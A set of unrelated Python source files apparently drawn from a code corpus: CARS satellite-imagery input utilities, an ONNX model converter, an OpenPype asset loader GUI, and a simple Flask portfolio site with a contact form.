#!/usr/bin/env python # coding: utf8 # # Copyright (c) 2020 Centre National d'Etudes Spatiales (CNES). # # This file is part of CARS # (see https://github.com/CNES/cars). # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """ Inputs module: contains some CARS global shared general purpose inputs functions """ # Standard imports import logging import os import struct import warnings from typing import Tuple # Third party imports import fiona import numpy as np import rasterio as rio import xarray as xr from json_checker import Checker from shapely.geometry import shape from cars.externals.otb_pipelines import read_image # Filter rasterio warning when image is not georeferenced warnings.filterwarnings("ignore", category=rio.errors.NotGeoreferencedWarning) def read_vector(path_to_file): """ Read vector file and returns the corresponding polygon :raise Exception when the input file is unreadable :param path_to_file: path to the file to open :type path_to_file: str :return: a shapely polygon :rtype: tuple (polygon, epsg) """ try: polys = [] with fiona.open(path_to_file) as vec_file: _, epsg = vec_file.crs["init"].split(":") for feat in vec_file: polys.append(shape(feat["geometry"])) except BaseException as base_except: raise Exception( "Impossible to read {} file".format(path_to_file) ) from base_except if len(polys) == 1: return polys[0], int(epsg) if len(polys) > 1: logging.info( "Multi features files are not supported, " "the first feature of {} will be used".format(path_to_file) ) return polys[0], int(epsg) logging.info("No feature is present in the {} file".format(path_to_file)) return None def read_geoid_file(): """ Read geoid height from OTB geoid file Geoid is defined by the $OTB_GEOID_FILE global environement variable. A default CARS geoid is deployed in setup.py and configured in conf/static_conf.py Geoid is returned as an xarray.Dataset and height is stored in the `hgt` variable, which is indexed by `lat` and `lon` coordinates. Dataset attributes contain geoid bounds geodetic coordinates and latitude/longitude step spacing. :return: the geoid height array in meter. :rtype: xarray.Dataset """ # Set geoid path from OTB_GEOID_FILE geoid_path = os.environ.get("OTB_GEOID_FILE") with open(geoid_path, mode="rb") as in_grd: # reading binary data # first header part, 4 float of 4 bytes -> 16 bytes to read # Endianness seems to be Big-Endian. lat_min, lat_max, lon_min, lon_max = struct.unpack( ">ffff", in_grd.read(16) ) lat_step, lon_step = struct.unpack(">ff", in_grd.read(8)) n_lats = int(np.ceil((lat_max - lat_min)) / lat_step) + 1 n_lons = int(np.ceil((lon_max - lon_min)) / lon_step) + 1 # read height grid. geoid_height = np.fromfile(in_grd, ">f4").reshape(n_lats, n_lons) # create output Dataset geoid = xr.Dataset( {"hgt": (("lat", "lon"), geoid_height)}, coords={ "lat": np.linspace(lat_max, lat_min, n_lats), "lon": np.linspace(lon_min, lon_max, n_lons), }, attrs={ "lat_min": lat_min, "lat_max": lat_max, "lon_min": lon_min, "lon_max": lon_max, "d_lat": lat_step, "d_lon": lon_step, }, ) return geoid def rasterio_get_nb_bands(raster_file: str) -> int: """ Get the number of bands in an image file :param f: Image file :returns: The number of bands """ with rio.open(raster_file, "r") as descriptor: return descriptor.count def rasterio_get_size(raster_file: str) -> Tuple[int, int]: """ Get the size of an image (file) :param raster_file: Image file :returns: The size (width, height) """ with rio.open(raster_file, "r") as descriptor: return (descriptor.width, descriptor.height) def rasterio_can_open(raster_file: str) -> bool: """ Test if a file can be open by rasterio :param raster_file: File to test :returns: True if rasterio can open file and False otherwise """ try: rio.open(raster_file) return True except Exception as read_error: logging.warning( "Impossible to read file {}: {}".format(raster_file, read_error) ) return False def ncdf_can_open(file_path): """ Checks if the given file can be opened by NetCDF :param file_path: file path. :type file_path: str :return: True if it can be opened, False otherwise. :rtype: bool """ try: with xr.open_dataset(file_path) as _: return True except Exception as read_error: logging.warning( "Exception caught while trying to read file {}: {}".format( file_path, read_error ) ) return False def otb_can_open(raster_file: str) -> bool: """ Test if file can be open by otb and that it has a correct geom file associated :param raster_file: filename :return: True if the file can be used with the otb, False otherwise """ can_open_status = False try: geom_path = "./otb_can_open_test.geom" read_image(raster_file, geom_path) if os.path.exists(geom_path): with open(geom_path) as geom_file_desc: geom_dict = {} for line in geom_file_desc: key, val = line.split(": ") geom_dict[key] = val # pylint: disable=too-many-boolean-expressions if ( "line_den_coeff_00" not in geom_dict or "samp_den_coeff_00" not in geom_dict or "line_num_coeff_00" not in geom_dict or "samp_num_coeff_00" not in geom_dict or "line_off" not in geom_dict or "line_scale" not in geom_dict or "samp_off" not in geom_dict or "samp_scale" not in geom_dict or "lat_off" not in geom_dict or "lat_scale" not in geom_dict or "long_off" not in geom_dict or "long_scale" not in geom_dict or "height_off" not in geom_dict or "height_scale" not in geom_dict or "polynomial_format" not in geom_dict ): logging.warning( "No RPC model set for image {}".format(geom_file_desc) ) can_open_status = False os.remove("./otb_can_open_test.geom") can_open_status = True else: logging.warning( "{} does not have associated geom file".format(raster_file) ) can_open_status = False except Exception as read_error: logging.warning( "Exception caught while trying to read file {}: {}".format( raster_file, read_error ) ) can_open_status = False return can_open_status def check_json(conf, schema): """ Check a dictionary with respect to a schema :param conf: The dictionary to check :type conf: dict :param schema: The schema to use :type schema: dict :returns: conf if check succeeds (else raises CheckerError) :rtype: dict """ schema_validator = Checker(schema) checked_conf = schema_validator.validate(conf) return checked_conf
the-stack_106_24421
import logging from typing import Optional, Tuple from .tflite import TFLiteConverter from .sklearn import SklearnConverter from .tensorflow import TensorflowConverter from .torch import TorchConverter class ModelConverter: def __init__(self, model_path: str, input_dims: Optional[Tuple[int]]): self.model_path = model_path self.input_dims = input_dims def apply_conversion(self) -> None: """ apply conversion to the model saves the result on the same path """ file_extension = self.model_path.split('.')[-1] if file_extension == 'onnx': logging.info('Nohting to do, model is already onnx') return converters = { 'h5': TensorflowConverter(), 'pkl': SklearnConverter(), 'tflite': TFLiteConverter(), 'pt': TorchConverter() } if file_extension not in converters: raise ValueError(f'unsupported file extension: {file_extension}') if file_extension == 'pt': converters[file_extension].transform_with_dims(self.model_path, self.input_dims) return converters[file_extension].transform(self.model_path) return
the-stack_106_24424
import sys from Qt import QtWidgets, QtCore from avalon import api, io, pipeline from openpype import style from openpype.tools.utils.widgets import AssetWidget from openpype.tools.utils import lib from .widgets import ( SubsetWidget, VersionWidget, FamilyListView, ThumbnailWidget, RepresentationWidget, OverlayFrame ) from openpype.modules import ModulesManager module = sys.modules[__name__] module.window = None # Register callback on task change # - callback can't be defined in Window as it is weak reference callback # so `WeakSet` will remove it immidiatelly def on_context_task_change(*args, **kwargs): if module.window: module.window.on_context_task_change(*args, **kwargs) pipeline.on("taskChanged", on_context_task_change) class LoaderWindow(QtWidgets.QDialog): """Asset loader interface""" tool_name = "loader" message_timeout = 5000 def __init__(self, parent=None): super(LoaderWindow, self).__init__(parent) title = "Asset Loader 2.1" project_name = api.Session.get("AVALON_PROJECT") if project_name: title += " - {}".format(project_name) self.setWindowTitle(title) # Groups config self.groups_config = lib.GroupsConfig(io) self.family_config_cache = lib.FamilyConfigCache(io) # Enable minimize and maximize for app window_flags = QtCore.Qt.Window if not parent: window_flags |= QtCore.Qt.WindowStaysOnTopHint self.setWindowFlags(window_flags) self.setFocusPolicy(QtCore.Qt.StrongFocus) main_splitter = QtWidgets.QSplitter(self) # --- Left part --- left_side_splitter = QtWidgets.QSplitter(main_splitter) left_side_splitter.setOrientation(QtCore.Qt.Vertical) # Assets widget assets_widget = AssetWidget( io, multiselection=True, parent=left_side_splitter ) assets_widget.set_current_asset_btn_visibility(True) # Families widget families_filter_view = FamilyListView( io, self.family_config_cache, left_side_splitter ) left_side_splitter.addWidget(assets_widget) left_side_splitter.addWidget(families_filter_view) left_side_splitter.setStretchFactor(0, 65) left_side_splitter.setStretchFactor(1, 35) # --- Middle part --- # Subsets widget subsets_widget = SubsetWidget( io, self.groups_config, self.family_config_cache, tool_name=self.tool_name, parent=main_splitter ) # --- Right part --- thumb_ver_splitter = QtWidgets.QSplitter(main_splitter) thumb_ver_splitter.setOrientation(QtCore.Qt.Vertical) thumbnail_widget = ThumbnailWidget(io, parent=thumb_ver_splitter) version_info_widget = VersionWidget(io, parent=thumb_ver_splitter) thumb_ver_splitter.addWidget(thumbnail_widget) thumb_ver_splitter.addWidget(version_info_widget) thumb_ver_splitter.setStretchFactor(0, 30) thumb_ver_splitter.setStretchFactor(1, 35) manager = ModulesManager() sync_server = manager.modules_by_name.get("sync_server") sync_server_enabled = False if sync_server is not None: sync_server_enabled = sync_server.enabled repres_widget = None if sync_server_enabled: repres_widget = RepresentationWidget( io, self.tool_name, parent=thumb_ver_splitter ) thumb_ver_splitter.addWidget(repres_widget) main_splitter.addWidget(left_side_splitter) main_splitter.addWidget(subsets_widget) main_splitter.addWidget(thumb_ver_splitter) if sync_server_enabled: main_splitter.setSizes([250, 1000, 550]) else: main_splitter.setSizes([250, 850, 200]) footer_widget = QtWidgets.QWidget(self) message_label = QtWidgets.QLabel(footer_widget) footer_layout = QtWidgets.QHBoxLayout(footer_widget) footer_layout.setContentsMargins(0, 0, 0, 0) footer_layout.addWidget(message_label, 1) layout = QtWidgets.QVBoxLayout(self) layout.addWidget(main_splitter, 1) layout.addWidget(footer_widget, 0) self.data = { "state": { "assetIds": None } } overlay_frame = OverlayFrame("Loading...", self) overlay_frame.setVisible(False) message_timer = QtCore.QTimer() message_timer.setInterval(self.message_timeout) message_timer.setSingleShot(True) message_timer.timeout.connect(self._on_message_timeout) families_filter_view.active_changed.connect( self._on_family_filter_change ) assets_widget.selection_changed.connect(self.on_assetschanged) assets_widget.refresh_triggered.connect(self.on_assetschanged) # TODO do not touch view in asset widget assets_widget.view.clicked.connect(self.on_assetview_click) subsets_widget.active_changed.connect(self.on_subsetschanged) subsets_widget.version_changed.connect(self.on_versionschanged) subsets_widget.refreshed.connect(self._on_subset_refresh) subsets_widget.load_started.connect(self._on_load_start) subsets_widget.load_ended.connect(self._on_load_end) if repres_widget: repres_widget.load_started.connect(self._on_load_start) repres_widget.load_ended.connect(self._on_load_end) self._sync_server_enabled = sync_server_enabled self._assets_widget = assets_widget self._families_filter_view = families_filter_view self._subsets_widget = subsets_widget self._version_info_widget = version_info_widget self._thumbnail_widget = thumbnail_widget self._repres_widget = repres_widget self._message_label = message_label self._message_timer = message_timer # TODO add overlay using stack widget self._overlay_frame = overlay_frame self.family_config_cache.refresh() self.groups_config.refresh() self._refresh() self._assetschanged() self._first_show = True def resizeEvent(self, event): super(LoaderWindow, self).resizeEvent(event) self._overlay_frame.resize(self.size()) def moveEvent(self, event): super(LoaderWindow, self).moveEvent(event) self._overlay_frame.move(0, 0) def showEvent(self, event): super(LoaderWindow, self).showEvent(event) if self._first_show: self._first_show = False self.setStyleSheet(style.load_stylesheet()) if self._sync_server_enabled: self.resize(1800, 900) else: self.resize(1300, 700) # ------------------------------- # Delay calling blocking methods # ------------------------------- def on_assetview_click(self, *args): # TODO do not touch inner attributes of subset widget selection_model = self._subsets_widget.view.selectionModel() if selection_model.selectedIndexes(): selection_model.clearSelection() def refresh(self): self.echo("Fetching results..") lib.schedule(self._refresh, 50, channel="mongo") def on_assetschanged(self, *args): self.echo("Fetching asset..") lib.schedule(self._assetschanged, 50, channel="mongo") def on_subsetschanged(self, *args): self.echo("Fetching subset..") lib.schedule(self._subsetschanged, 50, channel="mongo") def on_versionschanged(self, *args): self.echo("Fetching version..") lib.schedule(self._versionschanged, 150, channel="mongo") def set_context(self, context, refresh=True): self.echo("Setting context: {}".format(context)) lib.schedule(lambda: self._set_context(context, refresh=refresh), 50, channel="mongo") def _on_load_start(self): # Show overlay and process events so it's repainted self._overlay_frame.setVisible(True) QtWidgets.QApplication.processEvents() def _hide_overlay(self): self._overlay_frame.setVisible(False) def _on_subset_refresh(self, has_item): self._subsets_widget.set_loading_state( loading=False, empty=not has_item ) families = self._subsets_widget.get_subsets_families() self._families_filter_view.set_enabled_families(families) def _on_load_end(self): # Delay hiding as click events happened during loading should be # blocked QtCore.QTimer.singleShot(100, self._hide_overlay) # ------------------------------ def _on_family_filter_change(self, families): self._subsets_widget.set_family_filters(families) def on_context_task_change(self, *args, **kwargs): # Refresh families config self._families_filter_view.refresh() # Change to context asset on context change self._assets_widget.select_assets(io.Session["AVALON_ASSET"]) def _refresh(self): """Load assets from database""" # Ensure a project is loaded project = io.find_one({"type": "project"}, {"type": 1}) assert project, "Project was not found! This is a bug" self._assets_widget.refresh() self._assets_widget.setFocus() self._families_filter_view.refresh() def clear_assets_underlines(self): """Clear colors from asset data to remove colored underlines When multiple assets are selected colored underlines mark which asset own selected subsets. These colors must be cleared from asset data on selection change so they match current selection. """ # TODO do not touch inner attributes of asset widget last_asset_ids = self.data["state"]["assetIds"] or [] if not last_asset_ids: return assets_widget = self._assets_widget id_role = assets_widget.model.ObjectIdRole for index in lib.iter_model_rows(assets_widget.model, 0): if index.data(id_role) not in last_asset_ids: continue assets_widget.model.setData( index, [], assets_widget.model.subsetColorsRole ) def _assetschanged(self): """Selected assets have changed""" subsets_widget = self._subsets_widget # TODO do not touch subset widget inner attributes subsets_model = subsets_widget.model subsets_model.clear() self.clear_assets_underlines() # filter None docs they are silo asset_docs = self._assets_widget.get_selected_assets() asset_ids = [asset_doc["_id"] for asset_doc in asset_docs] # Start loading subsets_widget.set_loading_state( loading=bool(asset_ids), empty=True ) subsets_model.set_assets(asset_ids) subsets_widget.view.setColumnHidden( subsets_model.Columns.index("asset"), len(asset_ids) < 2 ) # Clear the version information on asset change self._thumbnail_widget.set_thumbnail(asset_docs) self._version_info_widget.set_version(None) self.data["state"]["assetIds"] = asset_ids # reset repre list if self._repres_widget is not None: self._repres_widget.set_version_ids([]) def _subsetschanged(self): asset_ids = self.data["state"]["assetIds"] # Skip setting colors if not asset multiselection if not asset_ids or len(asset_ids) < 2: self._versionschanged() return selected_subsets = self._subsets_widget.selected_subsets( _merged=True, _other=False ) asset_models = {} asset_ids = [] for subset_node in selected_subsets: asset_ids.extend(subset_node.get("assetIds", [])) asset_ids = set(asset_ids) for subset_node in selected_subsets: for asset_id in asset_ids: if asset_id not in asset_models: asset_models[asset_id] = [] color = None if asset_id in subset_node.get("assetIds", []): color = subset_node["subsetColor"] asset_models[asset_id].append(color) self.clear_assets_underlines() # TODO do not use inner attributes of asset widget assets_widget = self._assets_widget indexes = assets_widget.view.selectionModel().selectedRows() for index in indexes: id = index.data(assets_widget.model.ObjectIdRole) if id not in asset_models: continue assets_widget.model.setData( index, asset_models[id], assets_widget.model.subsetColorsRole ) # Trigger repaint assets_widget.view.updateGeometries() # Set version in Version Widget self._versionschanged() def _versionschanged(self): subsets = self._subsets_widget selection = subsets.view.selectionModel() # Active must be in the selected rows otherwise we # assume it's not actually an "active" current index. version_docs = None version_doc = None active = selection.currentIndex() rows = selection.selectedRows(column=active.column()) if active: if active in rows: item = active.data(subsets.model.ItemRole) if ( item is not None and not (item.get("isGroup") or item.get("isMerged")) ): version_doc = item["version_document"] if rows: version_docs = [] for index in rows: if not index or not index.isValid(): continue item = index.data(subsets.model.ItemRole) if item is None: continue if item.get("isGroup") or item.get("isMerged"): for child in item.children(): version_docs.append(child["version_document"]) else: version_docs.append(item["version_document"]) self._version_info_widget.set_version(version_doc) thumbnail_docs = version_docs asset_docs = self._assets_widget.get_selected_assets() if not thumbnail_docs: if len(asset_docs) > 0: thumbnail_docs = asset_docs self._thumbnail_widget.set_thumbnail(thumbnail_docs) if self._repres_widget is not None: version_ids = [doc["_id"] for doc in version_docs or []] self._repres_widget.set_version_ids(version_ids) # self._repres_widget.change_visibility("subset", len(rows) > 1) # self._repres_widget.change_visibility( # "asset", len(asset_docs) > 1 # ) def _set_context(self, context, refresh=True): """Set the selection in the interface using a context. The context must contain `asset` data by name. Note: Prior to setting context ensure `refresh` is triggered so that the "silos" are listed correctly, aside from that setting the context will force a refresh further down because it changes the active silo and asset. Args: context (dict): The context to apply. Returns: None """ asset = context.get("asset", None) if asset is None: return if refresh: # Workaround: # Force a direct (non-scheduled) refresh prior to setting the # asset widget's silo and asset selection to ensure it's correctly # displaying the silo tabs. Calling `window.refresh()` and directly # `window.set_context()` the `set_context()` seems to override the # scheduled refresh and the silo tabs are not shown. self._refresh() self._assets_widget.select_assets(asset) def _on_message_timeout(self): self._message_label.setText("") def echo(self, message): self._message_label.setText(str(message)) print(message) self._message_timer.start() def closeEvent(self, event): # Kill on holding SHIFT modifiers = QtWidgets.QApplication.queryKeyboardModifiers() shift_pressed = QtCore.Qt.ShiftModifier & modifiers if shift_pressed: print("Force quitted..") self.setAttribute(QtCore.Qt.WA_DeleteOnClose) print("Good bye") return super(LoaderWindow, self).closeEvent(event) def keyPressEvent(self, event): modifiers = event.modifiers() ctrl_pressed = QtCore.Qt.ControlModifier & modifiers # Grouping subsets on pressing Ctrl + G if (ctrl_pressed and event.key() == QtCore.Qt.Key_G and not event.isAutoRepeat()): self.show_grouping_dialog() return super(LoaderWindow, self).keyPressEvent(event) event.setAccepted(True) # Avoid interfering other widgets def show_grouping_dialog(self): subsets = self._subsets_widget if not subsets.is_groupable(): self.echo("Grouping not enabled.") return selected = [] merged_items = [] for item in subsets.selected_subsets(_merged=True): if item.get("isMerged"): merged_items.append(item) else: selected.append(item) for merged_item in merged_items: for child_item in merged_item.children(): selected.append(child_item) if not selected: self.echo("No selected subset.") return dialog = SubsetGroupingDialog( items=selected, groups_config=self.groups_config, parent=self ) dialog.grouped.connect(self._assetschanged) dialog.show() class SubsetGroupingDialog(QtWidgets.QDialog): grouped = QtCore.Signal() def __init__(self, items, groups_config, parent=None): super(SubsetGroupingDialog, self).__init__(parent=parent) self.setWindowTitle("Grouping Subsets") self.setMinimumWidth(250) self.setModal(True) self.items = items self.groups_config = groups_config # TODO do not touch inner attributes self.subsets = parent._subsets_widget self.asset_ids = parent.data["state"]["assetIds"] name = QtWidgets.QLineEdit() name.setPlaceholderText("Remain blank to ungroup..") # Menu for pre-defined subset groups name_button = QtWidgets.QPushButton() name_button.setFixedWidth(18) name_button.setFixedHeight(20) name_menu = QtWidgets.QMenu(name_button) name_button.setMenu(name_menu) name_layout = QtWidgets.QHBoxLayout() name_layout.addWidget(name) name_layout.addWidget(name_button) name_layout.setContentsMargins(0, 0, 0, 0) group_btn = QtWidgets.QPushButton("Apply") layout = QtWidgets.QVBoxLayout(self) layout.addWidget(QtWidgets.QLabel("Group Name")) layout.addLayout(name_layout) layout.addWidget(group_btn) group_btn.clicked.connect(self.on_group) group_btn.setAutoDefault(True) group_btn.setDefault(True) self.name = name self.name_menu = name_menu self._build_menu() def _build_menu(self): menu = self.name_menu button = menu.parent() # Get and destroy the action group group = button.findChild(QtWidgets.QActionGroup) if group: group.deleteLater() active_groups = self.groups_config.active_groups(self.asset_ids) # Build new action group group = QtWidgets.QActionGroup(button) group_names = list() for data in sorted(active_groups, key=lambda x: x["order"]): name = data["name"] if name in group_names: continue group_names.append(name) icon = data["icon"] action = group.addAction(name) action.setIcon(icon) menu.addAction(action) group.triggered.connect(self._on_action_clicked) button.setEnabled(not menu.isEmpty()) def _on_action_clicked(self, action): self.name.setText(action.text()) def on_group(self): name = self.name.text().strip() self.subsets.group_subsets(name, self.asset_ids, self.items) with lib.preserve_selection(tree_view=self.subsets.view, current_index=False): self.grouped.emit() self.close() def show(debug=False, parent=None, use_context=False): """Display Loader GUI Arguments: debug (bool, optional): Run loader in debug-mode, defaults to False parent (QtCore.QObject, optional): The Qt object to parent to. use_context (bool): Whether to apply the current context upon launch """ # Remember window if module.window is not None: try: module.window.show() # If the window is minimized then unminimize it. if module.window.windowState() & QtCore.Qt.WindowMinimized: module.window.setWindowState(QtCore.Qt.WindowActive) # Raise and activate the window module.window.raise_() # for MacOS module.window.activateWindow() # for Windows module.window.refresh() return except (AttributeError, RuntimeError): # Garbage collected module.window = None if debug: import traceback sys.excepthook = lambda typ, val, tb: traceback.print_last() io.install() any_project = next( project for project in io.projects() if project.get("active", True) is not False ) api.Session["AVALON_PROJECT"] = any_project["name"] module.project = any_project["name"] with lib.application(): window = LoaderWindow(parent) window.show() if use_context: context = {"asset": api.Session["AVALON_ASSET"]} window.set_context(context, refresh=True) else: window.refresh() module.window = window # Pull window to the front. module.window.raise_() module.window.activateWindow() def cli(args): import argparse parser = argparse.ArgumentParser() parser.add_argument("project") args = parser.parse_args(args) project = args.project print("Entering Project: %s" % project) io.install() # Store settings api.Session["AVALON_PROJECT"] = project from avalon import pipeline # Find the set config _config = pipeline.find_config() if hasattr(_config, "install"): _config.install() else: print("Config `%s` has no function `install`" % _config.__name__) show()
the-stack_106_24425
from flask import Flask, render_template, url_for, request, redirect import smtplib import csv app = Flask(__name__) def write_to_db(data): with open('database.txt', mode='a') as db: email = data['email'] name = data['name'] subject = data['subject'] message = data['message'] file = db.write(f'\n{email},{name},{subject},{message}') def write_to_csv(data): with open('database.csv', mode='a',newline='') as csv_db: email = data['email'] name = data['name'] subject = data['subject'] message = data['message'] csv_writer = csv.writer(csv_db, delimiter=',', quotechar='"', quoting = csv.QUOTE_MINIMAL) csv_writer.writerow([email,name,subject,message]) def send_mail(i_sender_name, i_sender_email, i_subject, i_message): server = smtplib.SMTP("smtp.gmail.com",587) server.starttls() website_email_address = 'Website email' server.login(website_email_address, "Website email password") formatted_message = f'From: {i_sender_email}, {i_sender_name}\nSubject: {i_subject}\nMessage: {i_message}' server.sendmail(website_email_address, 'Personal email', formatted_message) @app.route('/', methods=['POST', 'GET']) def hello_world(): return render_template('index.html') @app.route('/<string:page_name>') def html_page(page_name): return render_template(page_name + '.html') @app.route('/submit_form', methods = ['POST', 'GET']) def submit_form(): if request.method == 'POST': try: write_to_csv(request.form.to_dict()) # write_to_db(request.form.to_dict()) # send_mail(name, email, subject, message) uncomment and edit send_mail function so the website will send you email when people try to contact you. return redirect('/thankyou') except: return 'data was not saved in database' else: return '<Error: not a post request>'